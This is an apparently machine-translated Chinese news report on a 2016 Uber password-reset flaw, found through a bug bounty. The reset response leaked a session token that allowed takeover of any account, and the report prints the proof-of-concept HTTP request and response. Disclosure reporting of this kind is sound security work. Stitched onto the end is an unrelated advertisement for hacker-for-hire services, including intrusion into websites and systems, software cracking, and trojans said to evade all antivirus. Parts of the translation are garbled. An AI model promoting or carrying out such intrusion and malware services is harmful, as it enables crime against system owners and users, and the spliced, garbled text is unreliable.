意大利安全专家Vincenzo C. Aka在优步平台上发现了身份验证漏洞,任何帐户都可以使用此漏洞重置密码。这一发现于昨天正式宣布。事实上,七个月前发现了引发“身份危机”的漏洞。 Vincenzo C. Aka通过HackerOne的Bug Bounty项目报告了Uber的漏洞(他在HackerOne平台上的帐户是procode701)。
制定此漏洞的时间表如下:
2016年10月2日 - 向优步报告漏洞
2016年10月4日 - 漏洞评级
2016年10月6日 - 修复漏洞
2016年10月18日 - 研究人员获得10,000美元的奖励
如何重用旧漏洞?
“您只需使用一个优步有效的帐户电子邮件地址即可接管帐户。响应密码重置HTTP请求,将公开响应令牌。也就是说,攻击者可以重新启动重置请求并快速接收它。重置令牌。“
优步回应说,“保护用户的数据安全是首要任务,因此我们对此报告非常感兴趣。此外,我们很高兴与procode701合作,并希望他能在未来报告更多漏洞。”
意大利专家发现,可以利用此过程生成身份验证令牌“inAuthSessionID”,该令牌可以更改任何帐户的密码。
有关详细信息,securityaffairs网站联系了Vincenzo C. Aka。 Vincenzo C. Aka表示,只需使用任何Uber帐户的有效电子邮件地址发送重置密码的请求,它就会收到包含“inAuthSessionID”会话令牌的响应。只要用户发送请求电子邮件以重置密码,Uber平台每次都会生成一个特定的会话令牌。
获取会话令牌“inAuthSessionID”后,攻击者可以进入重置密码界面,通过普通链接更改密码。
1,0,01717 auth.uber.com/login/stage/PASTE SESSION ID< -generate更改电子邮件密码inAuthSessionID/af9b9d0c-bb98-41de-876c-4cb911c79bd1< - tokenID没有到期时间 POST/login/handleanswer HTTP/1.1主机: auth.uber.com {'init': false,'answer': {'type':'PASSWORD_RESET_WITH_EMAIL','userIdentifier': {'email':'xxxx@uber.com'} } } 答复 HTTP/1.1 200好的 {'inAuthSessionID':'cdc1a741-0a8b-4356-8995-8388ab4bbf28','stage': {'question': {'signinToken':'','type':'VERIFY_PASSWORD_RESET','tripChallenges': [] },'alternative': [] } } 这是一个高风险漏洞,攻击者可以通过该漏洞进入任何帐户并从任何用户获取数据(例如,身份信息,银行数据,驾驶执照信息),包括财务数据。 这不是优步第一次陷入漏洞危机。有关更多信息,请参阅FreeBuf的上一份报告: 美国流行的出租车应用程序Uber暴露于收集用户隐私 优步数据库被入侵,有50,000名司机泄露了信息 优步修复了三个漏洞,白帽子获得了数千美元的奖励(包括漏洞分析) *参考源securityaffairs,本文作者sun 黑客业务列表介绍和一般分类: 类别:攻击入侵破解开发 1:攻击业务订单:暂时取消所有此类业务订单[仅销售常规IDC流量] 2:入侵业务清单:包括网站源代码,办公系统,黑色系统,教育系统等。 3:破解业务类:软件,加密文件,二次打包,脱壳等。 4:二次开发业务清单:软件二次开发,源代码二次开发等 5:其他业务订单:特洛伊木马[通过所有防病毒],远程控制,特殊软件等 备注:未提及的业务订单可根据主要类别查询或直接联系客户服务。为避免浪费双方时间,请在咨询前阅读:业务交易流程及相关说明 注意:仅接受正式业务,个人无权接受。收集此内容。